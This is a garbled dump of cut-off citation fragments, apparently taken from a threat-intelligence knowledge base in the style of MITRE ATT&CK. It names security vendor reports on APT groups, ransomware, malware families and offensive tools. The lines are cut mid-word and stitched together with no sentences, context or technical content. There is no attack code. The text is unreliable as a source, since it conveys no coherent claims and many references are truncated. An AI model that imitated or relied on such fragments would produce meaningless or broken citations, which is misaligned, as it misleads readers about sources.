itation: trendmicro_redcurl),(Citation: BitDefender Chafer May 2020),(Citation: FoxIT Wocao December 2019),(Citation: Unit 42 MechaFlo
Leonardo Turla Penquin May 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: objectivesee osx.shlayer apple approved 2020),(C
Mandiant UNC3313 Feb 2022),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit 4
ation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Mandia

MalwareBytes SideCopy Dec 2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),

ober 2020),(Citation: Talos TinyTurla September 2021),

itten December 2020),(Citation: US-CERT TA18-074A),(Citation: GitHub Pupy),(Citation: Intezer TeamTNT September 2020),(Citation: Kasp
ation: TrendMicro macOS Dacls May 2020),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Kandji Cuckoo April 2024),(Citati

on Double Tap),(Citation: FOX-IT May 2016 Mofang),(Citation: NCC Group WastedLocker June 2020),(Citation: PowerSploit Documentation
y 2019),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: Volexity Patchwork June 2018),(Citation: Symantec Muddy

olen Pencil Dec 2018),(Citation: BiZone Lizar May 2021),(Citation: Talos Konni May 2017),(Citation: Cybereason Chaes Nov 2020),(Citation:

y 2022),(Citation: McAfee Shamoon December 2018),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: ESET BlackEne

Apr 2019),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Valak July 2020),(Citation: La
ke Carbon Spider August 2021),(Citation: IBM MegaCortex),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: DFIR Conti Ba

SCRIBE MAY 2020),(Citation: ESET InvisiMole June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: ESET InvisiMole

Bazar Nov 2021),(Citation: Cylance Dust Storm),(Citation: ESET Carbon Mar 2017),(Citation: CISA EB Aug 2020),(Citation: PWC Cloud Hopp

b 2018),(Citation: Palo Alto OilRig May 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Dell TG-3390),(Citation: Bitdefender Luminou

April 2021),(Citation: PWC WellMess July 2020),(Citation: ESET Crutch December 2020),(Citation: S2 Grupo TrickBot June 2017),(Citation: C

cro Patchwork Dec 2017),(Citation: ESET Turla PowerShell May 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: Proofpoint Opera
k Basta May 2022),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: Minerva Labs Black Basta May 2022),(Citation: Ready.g
ry 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET Industroyer),(Citation: Mandiant APT41),(Citation: Cybereason Co

(Citation: F-Secure The Dukes),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Google TAG Lazarus

ovetta Blockbuster),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: FireEye APT38 Oct 2018),(Citation: SentinelOne Agriu
n: DFIR_Quantum_Ransomware),(Citation: GitHub PoshC2),(Citation: TrendMicro EarthLusca 2022),(Citation: SocGholish-update),(Citation

erwood Sept 2012),(Citation: IBM Grandoreiro April 2020),(Citation: Unit 42 ProjectM March 2016),(Citation: ESET RTM Feb 2017),(Citation
ber 2020),(Citation: Unit42 Redaman January 2019),(Citation: AsyncRAT GitHub),(Citation: Cisco Umbrella DGA Brute Force),(Citation: Cybe

taRicto November 2020),(Citation: Intezer Doki July 20),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye APT34 Dec 2017),(Citation: U

roll Qakbot June 2020),(Citation: TrustedSec OOB Communications)

iant APT29 Eye Spy Email Nov 22),(Citation: US-CERT TA18-074A),(Citation: Symantec Seaduke 2015),(Citation: DFIR Phosphorus Novembe
bereason Chaes Nov 2020),
September 2021),(Citation: NCSC APT29 July 2020),(Citation: IBM IcedID November 2017),(Citation: TrendMicro Tropic Trooper May 2020)
tdefender APT28 Dec 2015),(Citation: FRP GitHub),(Citation: Microsoft PLATINUM April 2016),(Citation: Kaspersky CactusPete Aug 2020),(

March 2024),(Citation: IBM ITG18 2020),(Citation: Cylance Dust Storm),(Citation: PWC Yellow Liderc 2023),(Citation: Crowdstrike Indrik N
2022),(Citation: Volexity Ocean Lotus November 2020),
,(Citation: Bitdefender FIN8 July 2021),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Mandiant No Easy Breach),(Citation: ESET Turla P
ruary 2011),(Citation: Crowdstrike Indrik November 2018),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Trellix Darkgate 2023)

tation: Bitdefender FunnyDream Campaign November 2020),(Citation: Trustwave Cherry Picker),(Citation: Mandiant Cutting Edge January
tion: FOX-IT May 2016 Mofang),(Citation: Talos Kimsuky Nov 2021),(Citation: McAfee GhostSecret),(Citation: Korean FSI TA505 2020),(Cita

heck Logs October 2023),(Citation: ClearSky Lazarus Aug 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro EarthLusca

tion: Volexity Exchange Marauder March 2021),(Citation: Mandiant APT41),(Citation: Cisco Group 72),(Citation: Cybereason Soft Cell June 2
e Dust Storm),(Citation: RiskIQ Cobalt Nov 2017),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Cyla

Empire),(Citation: F-Secure The Dukes),(Citation: ESET Sednit July 2015),(Citation: FireEye Fin8 May 2016),(Citation: GitHub PoshC2),(Citati
n: Crowdstrike Qakbot October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: GitHub PoshC2),(Citation: TrendMicro EarthL
ua Kinsing April 2020),(Citation: CISA GRU29155 2024),(Citation: Booz Allen Hamilton),(Citation: SecureWorks BRONZE UNION June 2017),
ation: ANSSI Sandworm January 2021),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Joint
oreFang July 2016),(Citation: Riskiq Remcos Jan 2018),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Tren

mware),(Citation: SWAT-hospital),(Citation: Cyber Safety Review Board: Lapsus)

019),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Proofpoint TA453 July2021),(Citation: Kaspersky Threa

2018),(Citation: ESET Attor Oct 2019),(Citation: LogRhythm WannaCry),(Citation: CISA AppleJeus Feb 2021),(Citation: Symantec Calisto July

lperovitch 2014),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Kaspersky ToddyCat Check Logs October 2023),(

A Oct 2017)

Empire),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Eset Ramsay May 2020),(Citation: Group IB RTM August 2019),(Citation: Ncc
ation: Cybereason Soft Cell June 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Arbor Musical Chairs Feb 2018),(Citation: ESET Ca
Wocao December 2019),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Fidelis njRAT June 2013),(Citation: US-CERT BA
Fortinet Diavol July 2021),(Citation: Lumen KVBotnet 2023),(Citation: Talos Kimsuky Nov 2021),(Citation: Korean FSI TA505 2020),(Citation:

ofpoint Leviathan Oct 2017),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation:

ation: McAfee Gold Dragon),(Citation: ESET Hermetic Wizard March 2022),(Citation: Crowdstrike DNC June 2016),(Citation: DOJ GRU Indict
24),(Citation: Secureworks Karagany July 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant Pulse Se

ESET DazzleSpy Jan 2022),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: FireEye Periscope March 2018),(Citation: Mc

ols WinterVivern 2021),(Citation: Aquino RARSTONE),(Citation: Intezer TeamTNT September 2020),(Citation: Unit 42 Valak July 2020),(Cita
Olympic Destroyer 2018),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Sec

y),(Citation: Mandiant APT1 Appendix),(Citation: Microsoft PLATINUM April 2016),(Citation: cobaltstrike manual),(Citation: Trend Micro Q

e DDEAUTO Oct 2017),(Citation: BleepingComputer DDE Disabled in Word Dec 2017),(Citation: Microsoft Protected View),(Citation: Micros
crosoft NICKEL December 2021),(Citation: ESET Gamaredon June 2020),(Citation: ESET InvisiMole June 2020),(Citation: Bromium Ursnif Ma
Oct 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: CyberScoop FIN7 Oct 2017),(Citation: McAfee Sharpshooter December 201
),(Citation: FireEye FIN10 June 2017),(Citation: FoxIT Wocao December 2019),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: R

ober 2019),(Citation: MSTIC FoggyWeb September 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: CISA AR2

n: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Unit42 OceanLotus 2017),(Citation: Talos Promethium June 2020),(Citation: Mand
2020),(Citation: Mandiant APT1 Appendix),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Trend Micro IXESHE 2012),(Citati

16),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Cylance Sodinokibi July 2019),(Citation: F

: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: S2 Grupo TrickBot June 2017),(Citation: Checkpoint MosesStaff Nov 2021),(

owerShell Empire),(Citation: ESET Hermetic Wizard March 2022),(Citation: Symantec Daggerfly 2023),(Citation: BlackBerry CostaRicto Nove
2020),(Citation: Symantec Orangeworm April 2018),(Citation: Cybereason Cobalt Kitty 2017),(Citation: CME Github September 2018),(Cita
019),(Citation: Kaspersky Turla Penquin December 2014),(Citation: FireEye MESSAGETAP October 2019),(Citation: GitHub Responder),
tion: Unit42 OceanLotus 2017),(Citation: FireEye FiveHands April 2021),(Citation: ESET Carbon Mar 2017),(Citation: ESET Turla Lunar tools
ickBot Oct 2016),(Citation: ESET DazzleSpy Jan 2022),(Citation: Trend Micro Totbrick Oct 2016),(Citation: S2 Grupo TrickBot June 2017),(Ci
ation: Cylance Shaheen Nov 2018),(Citation: GitHub SHB Credential Guard),(Citation: AdSecurity DCSync Sept 2015),(Citation: Microsoft Di

Leafminer July 2018),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Github AD-Pentest-Script),(Citation: US-CERT TA18-074A
Report Public Tools),(Citation: Amplia WCE),(Citation: FireEye APT41 Aug 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Cita
Apr 2019),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Rostovcev APT41 2021),(Citation: Core Securi

29155 2024),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: F-Secure The Dukes),(Citation: Cybereason OperationCuckooBe
13 July 2015),(Citation: FireEye NETWIRE March 2019),(Citation: DustySky),(Citation: Microsoft PLATINUM April 2016),(Citation: Sandfly BPF
024),(Citation: ESET Gelsemium June 2021),(Citation: Haq 2014),(Citation: Sophos SamSam Apr 2018),(Citation: Proofpoint Leviathan Oct 2
,(Citation: ESET ComRAT May 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Unit 42 CA

Citation: Latrodectus APR 2024),(Citation: Unit42 Agrius 2023),(Citation: Elastic Pikabot 2024),(Citation: Mandiant ROADSWEEP August 202
: F-Secure CozyDuke),(Citation: Lumen Versa 2024),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: MSTIC FoggyW
tation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Cybereason OperationCuckooBees May 2022),(Citati

umentation),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ESET Gazer Aug 2017),(Citation: ESET InvisiMole June 2020),

Cisco Operation Layover September 2021),(Citation: ESET OceanLotus macOS April 2019),(Citation: Red Canary NETWIRE January 2020),(Ci
b Invoke-PSImage),(Citation: Antiy CERT Ramsay April 2020),(Citation: Group IB Ransomware September 2020),(Citation: Unit 42 TA551 Ja

7),(Citation: NSA NCSC Turla OilRig),(Citation: Bitdefender LuminousMoth July 2021),

T28 Hospitality Aug 2017),(Citation: Securelist APT Trends Q2 2017),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Talos Kimsuky N

Eset Ramsay May 2020),(Citation: Talos Oblique RAT March 2021),(Citation: FoxIT Wocao December 2019),(Citation: Cybereason Operatio
ogs October 2023),(Citation: Symantec Buckeye),(Citation: SentinelOne Gootloader June 2021),(Citation: CrowdStrike StellarParticle Januar
TT Security Flagpro new December 2021),(Citation: TrendMicro Tonto Team October 2020),(Citation: Cobalt Strike Manual 4.3 November

aine Threat Landscape March 2022),(Citation: Google TAG COLDRIVER January 2024),(Citation: DOJ Iran Indictments March 2018),(Citation

ul 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: Trend Micro IXESHE 201
019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: ESET Operation Spalax Jan 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: N

tform Module)

lude Profile),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: RotaJakiro 2021 netlab360 analys
er 2020),(Citation: Cisco Operation Layover September 2021),(Citation: BiZone Lizar May 2021),(Citation: Joe Sec Trickbot),(Citation: US-CE

itation: Proofpoint TA505 October 2019),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: ESET Turla Mosquito May 2018)

: ATT QakBot April 2021),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Ensilo Darkgate 2018),(Citation: FireEye NETWIRE March 2019),(

Strike PIONEER KITTEN August 2020),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 2019),(Citation: FRP GitHub),(Cit
bruary 2020),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: Proofpoint TA505 October 2019),(Citation: Joint Cybersecurity A

eration Double Tap),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: TrendMicro Tonto Team October 2020),(Citation: FOX-IT M
Sednit Part 2),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Novetta Winnti April 2015),(Citation: CISA AA24-038A PRC Cri
MSTIC Nobelium Oct 2021),(Citation: Kaspersky ToddyCat June 2022),(Citation: BlackBerry CostaRicto November 2020),(Citation: synack 2
,(Citation: ESET Turla PowerShell May 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Kaspersky WIR
ual 4.3 November 2020),(Citation: Mandiant APT43 March 2024),(Citation: McAfee Cuba April 2021),(Citation: PowerSploit Documentation
n February 2021),(Citation: US-CERT Ukraine Feb 2016),(Citation: Securelist DarkVishnya Dec 2018),(Citation: Dell Dridex Oct 2015),(Citatio
on: CERT-FR PYSA April 2020),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: FireEye Know Your Enemy FIN8 A
Citation: Trend Micro Black Basta October 2022),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Checkpoint MosesSt
T39 Jan 2019),(Citation: Anomali Rocke March 2019),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Securelist GCMAN),(Citation: P

oper May 2020),(Citation: Arctic Wolf Akira 2023),(Citation: ESET Industroyer),(Citation: NCC Group Chimera January 2021),(Citation: Cybe
ft SIR Vol 19),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Kaspersky Flame),(Citation: TrendMicro Ursnif Mar 2015),(Citation

8 Oct 2018),(Citation: ESET LoJax Sept 2018),(Citation: ESET Ebury May 2024),(Citation: NCSC Joint Report Public Tools),(Citation: Kaspersky

A2541 February 2022),(Citation: Trend Micro Qakbot December 2020),(Citation: Talos Smoke Loader July 2018),(Citation: Unit 42 OilRig Sep

versity of Birmingham C2)

itation: DOJ GRU Indictment Jul 2018),(Citation: Carbon Black HotCroissant April 2020),(Citation: Unit42 Sofacy Dec 2018),(Citation: BiZone
Panda Web Shells),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Unit42 OilRig Playbook 2023),(Citation: Secureworks BRONZE SILH

SA April 2020),(Citation: Unit42 Clop April 2021),(Citation: Cybereason Royal December 2022),(Citation: Dragos Crashoverride 2017),(Citati
),(Citation: Cybereason Astaroth Feb 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Medium Ali Salem Bumblebee April 2022),

Citation: ESET RTM Feb 2017),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Mandian
on: TechNet Netsh),(Citation: BiZone Lizar May 2021),(Citation: Korean FSI TA505 2020),(Citation: DFIR Ryuk's Return October 2020),(Citati

1),(Citation: Unit 42 Gamaredon February 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Operation Spalax Jan 2021),(Citati

January 2024),(Citation: Kaspersky TajMahal April 2019),(Citation: Session Management Cheat Sheet),(Citation: Token tactics),(Citation: E

tion: Harmj0y Kerberoast Nov 2016),(Citation: AdSecurity Cracking Kerberos Dec 2015)

ot February 2022 ),(Citation: Unit 42 BackConfig May 2020),(Citation: FireEye Periscope March 2018),(Citation: Checkpoint MosesStaff Nov

Crowdstrike GTR2020 Mar 2020),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Mandiant FIN7 Apr 2022),(Citation: Secureworks IR
sco Operation Layover September 2021),(Citation: unit42_gamaredon_dec2022),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation
cember 2020),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: 360 Machete Sep 2020),(Citation: Zscaler APT31 Covid-19 O

ctober 2022),(Citation: Cyberint Qakbot May 2021),(Citation: Red Canary Qbot),(Citation: FireEye APT19),(Citation: Fidelis INOCNATION),(C
orean FSI TA505 2020),(Citation: Novetta Winnti April 2015),(Citation: IBM MegaCortex),(Citation: Securelist MuddyWater Oct 2018),(Cita

un 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: M
T December 2018),
),(Citation: Cylance Dust Storm),(Citation: Kandji Cuckoo April 2024),(Citation: Unit42 Molerat Mar 2020),(Citation: Microsoft NICKEL Decem
2018),(Citation: ESET Operation Groundbait),(Citation: S2 Grupo TrickBot June 2017),(Citation: Checkpoint MosesStaff Nov 2021),(Citation
ebruary 2024),(Citation: McAfee Sharpshooter December 2018),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: DFIR Phosphorus Novem

Eye APT41 Aug 2019),(Citation: Trend Micro TeamTNT),(Citation: ESET Turla PowerShell May 2019),(Citation: DFIR Report APT35 ProxyShe
diant APT1 Appendix),(Citation: Microsoft PLATINUM April 2016),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FireEye FIN

ck Malware Aug 2019),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: S2 Grupo TrickBot June 2017),(Citation: Bitdefe

ver),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: Impacket Tools),(Citation: SecureList Silen
tion: US-CERT SHARPKNOT June 2018),(Citation: Unit42 Agrius 2023),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Qualys Herm
IR Conti Bazar Nov 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien Febru
t Cloudy Logs 2023),(Citation: TechNet Applocker vs SRP)
jection MAR 2018),(Citation: Microsoft Disable Macros)

e APT10 April 2017),(Citation: Microsoft Nobelium Admin Privileges),(Citation: Office 365 Partner Relationships)

8),(Citation: Github PowerShell Empire),(Citation: Volexity Patchwork June 2018),(Citation: Symantec MuddyWater Dec 2018),(Citation: Tre

cember 2019),(Citation: SentinelLabs Metador Sept 2022),(Citation: Microsoft Primary Refresh Token),(Citation: cisco_deploy_rsa_keys)
on: NCSC Joint Report Public Tools),(Citation: Crowdstrike HuntReport 2022),(Citation: NSA Spotting),(Citation: GitHub IAD Secure Host Bas

020),(Citation: FireEye APT19),(Citation: FireEye NETWIRE March 2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Micr

20),(Citation: Trend Micro TA505 June 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: ESET Operation Spalax Jan 2021),(Citation
NC Ransomware November 2023),(Citation: Huntress INC Ransomware May 2024),(Citation: PWC Cloud Hopper April 2017),(Citation: FireE
ces),(Citation: Microsoft Azure security baseline for Azure Active Directory),(Citation: TechNet Least Privilege)

sky ToddyCat Check Logs October 2023),(Citation: Symantec Buckeye),(Citation: cobaltstrike manual),(Citation: CrowdStrike StellarParticle
(Citation: cobaltstrike manual),(Citation: TechNet Least Privilege),(Citation: Kubernetes Service Accounts),(Citation: Microsoft Remote Use
ation: DigiTrust Agent Tesla Jan 2017),(Citation: CISA GRU29155 2024),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Github Powe
20),(Citation: ESET Operation Spalax Jan 2021),(Citation: Trendmicro_IcedID),(Citation: Kaspersky StoneDrill 2017),(Citation: FireEye Hancit
: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: ATT QakBot April 2021),(Citation: Ensilo Darkgate 2018),(Citation: ESET Atto
il 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: Kaspersky CactusPete Aug 2020),(Citation: ESET Okrum July 2019),(Citation: Cyberea

otus November 2020),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Palo Alto Latr
2018),(Citation: FireEye Periscope March 2018),(Citation: ESET Crutch December 2020),(Citation: Securelist ScarCruft May 2019),(Citation:
CharmPower January 2022),(Citation: Unit42 Redaman January 2019),(Citation: Palo Alto PlugX June 2017),

ation: Mandiant FIN13 Aug 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Unit42 Sofacy Dec 2018),(Citation: Microsoft 365
2018),(Citation: CISA AppleJeus Feb 2021),(Citation: Github PowerShell Empire),(Citation: ESET Gelsemium June 2021),(Citation: Rancor Un

nical Appendix Sept 2022),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Micr

oll),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Microsoft runas),(Citation: Microsoft Create Token),(Citation: Microsoft

eration Ke3chang November 2014),(Citation: FireEye FIN6 April 2016),(Citation: Cybereason Bumblebee August 2022),(Citation: Securewo

Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Cybereason Valak May 2020),(Citation: SecureWorks BRONZE UNION June 2017),(Citatio

urt of NY APT10 Indictment December 2018),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: ThreatConnect Kims

ackerNews IndigoZebra July 2021),(Citation: McAfee Sharpshooter December 2018),(Citation: Latrodectus APR 2024),(Citation: FireEye APT
Micro Black Basta October 2022),(Citation: Unit42 RDAT July 2020),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July 201
2020),(Citation: Cylance Machete Mar 2017),(Citation: Unit 42 NOKKI Sept 2018),
ybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Kaspersky ProjectSauron Full Report),(Citation: ESET Sednit Part 2),(C

TA459 April 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: Proofpoint TA505 October 2
tation: Volexity PowerDuke November 2016),(Citation: NTT Security Flagpro new December 2021),(Citation: Novetta Blockbuster),(Citation
n: District Court of NY APT10 Indictment December 2018),(Citation: ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Cita
UELIGHT August 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: FireEye APT30),(Citation: Novetta Blockbuster RATs),(Citation: Bl

Citation: McAfee Honeybee),(Citation: ESET Turla Lunar toolset May 2024),(Citation: NCC Group Chimera January 2021),(Citation: ESET No
fly 2023),(Citation: Imminent Unit42 Dec2019),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: 3
020),(Citation: FireEye FIN6 April 2016),(Citation: ESET RTM Feb 2017),(Citation: Unit42 OilRig Playbook 2023),(Citation: CERT-UA WinterViv
eration Transparent Tribe March 2016),(Citation: ESET Gamaredon June 2020),(Citation: ESET Windigo Mar 2014),(Citation: group-ib_redc

rzone Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: ESET Sednit Part 1),(Citation: Group IB APT 41 June 2021),(Citation: Dus

to OilRig May 2016),(Citation: F-Secure BlackEnergy 2014),(Citation: Accenture Hogfish April 2018),(Citation: Cylance Dust Storm),(Citation

4-038A PRC Critical Infrastructure February 2024),(Citation: Kandji Cuckoo April 2024),

Agrius 2023),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye APT39 Jan 2019),(Citation: CISA AA20-296A Berserk Bear Dece
mizing Services),(Citation: Microsoft Common Conditional Access Policies),(Citation: NIST 800-63-3)
0),(Citation: Okta Block Anonymizing Services),(Citation: Microsoft Common Conditional Access Policies),(Citation: NIST 800-63-3)

),(Citation: F-Secure Cosmicduke),(Citation: FoxIT Wocao December 2019),(Citation: McAfee Gold Dragon),(Citation: Unit 42 VERMIN Jan 2

nit42 OilRig Nov 2018),(Citation: ANSSI Sandworm January 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: FBI FLASH APT39 Sep

ng Malware July 2020),(Citation: Volexity Ocean Lotus November 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: ESET Turla Mosquito

STANG PANDA June 2018),(Citation: Check Point Warzone Feb 2020),(Citation: FireEye APT19),(Citation: Kersten Akira 2023),(Citation: Fire
9),(Citation: Unit 42 MechaFlounder March 2019),(Citation: Morphisec ShellTea June 2019),(Citation: GitHub SILENTTRINITY March 2022),
layer apple approved 2020),(Citation: Cisco Talos Intelligence Group),(Citation: ESET TeleBots Oct 2018),(Citation: Unit 42 Kazuar May 201
ATs April 2019),(Citation: Unit 42 QUADAGENT July 2018),(Citation: MuddyWater TrendMicro June 2018),(Citation: Proofpoint TA2541 Febr
ctober 2019),(Citation: Mandiant FIN12 Oct 2021),(Citation: ESET Gelsemium June 2021),(Citation: Joint Cybersecurity Advisory AA23-129A

ptember 2020),(Citation: Kaspersky Flame),(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Mandiant Pulse Sec
ndji Cuckoo April 2024),(Citation: wardle evilquest parti),(Citation: Objective-See MacMa Nov 2021),(Citation: piazza launch agent mitigati

n: PowerSploit Documentation),(Citation: Avertium Black Basta June 2022),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Aug 201
8),(Citation: Symantec MuddyWater Dec 2018),(Citation: BitDefender Chafer May 2020),(Citation: F-Secure The Dukes),(Citation: CopyKitt

on Chaes Nov 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Infoblox Lokibot January 2019),(Citation: NCSC Joint Report Pu

2019),(Citation: ESET BlackEnergy Jan 2016),(Citation: US-CERT Ukraine Feb 2016),(Citation: US District Court Indictment GRU Unit 74455 O

2 Valak July 2020),(Citation: Latrodectus APR 2024),(Citation: Cylance Dust Storm),(Citation: Unit42 OceanLotus 2017),(Citation: Nicolas Fa
2022),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Bleeping Computer INC Ransomware March 2024),(Citation: FireEye APT41 Aug 201

020),(Citation: ESET InvisiMole June 2018),(Citation: MAR10135536-F),

20),(Citation: PWC Cloud Hopper April 2017),(Citation: McAfee Honeybee),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandia

Citation: Bitdefender LuminousMoth July 2021),

rickBot June 2017),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Group IB APT 41

9),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Machete Mar 2017),(Citation: CheckPoint Naikon May
a May 2022),(Citation: Ready.gov IT DRP)
PT41),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: RotaJakiro 2021 netlab360 analysis),(Cita

,(Citation: Google TAG Lazarus Jan 2021),(Citation: Kaspersky LuminousMoth July 2021),(Citation: KISA Operation Muzabi),(Citation: BlackB

8),(Citation: SentinelOne Agrius 2021),(Citation: US-CERT SHARPKNOT June 2018),(Citation: Microsoft Albanian Government Attacks Septe
n: SocGholish-update),(Citation: Symantec Daggerfly 2023),(Citation: CrowdStrike StellarParticle January 2022),(Citation: CrowdStrike Blood

ESET RTM Feb 2017),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: CERT-UA WinterVivern 2023),(Citation: Secur
GA Brute Force),(Citation: Cybereason Dissecting DGAs)

APT34 Dec 2017),(Citation: Unit 42 TA551 Jan 2021),(Citation: SANS Conficker),(Citation: CheckPoint Naikon May 2020),(Citation: Cyberea

on: DFIR Phosphorus November 2021),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Microsoft NICKEL December 2021),(Citation: NC

cro Tropic Trooper May 2020),(Citation: ESET Gazer Aug 2017),(Citation: FireEye FiveHands April 2021),(Citation: Talos Promethium June 2
persky CactusPete Aug 2020),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Intezer HiddenWasp Map 2019),(Citation: Man

Citation: Crowdstrike Indrik November 2018),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Kaspersky ThreatNeedle Feb 202
Breach),(Citation: ESET Turla PowerShell May 2019),(Citation: FireEye WMI 2015),(Citation: GitHub SILENTTRINITY Modules July 2019),(Cita
Citation: Trellix Darkgate 2023),

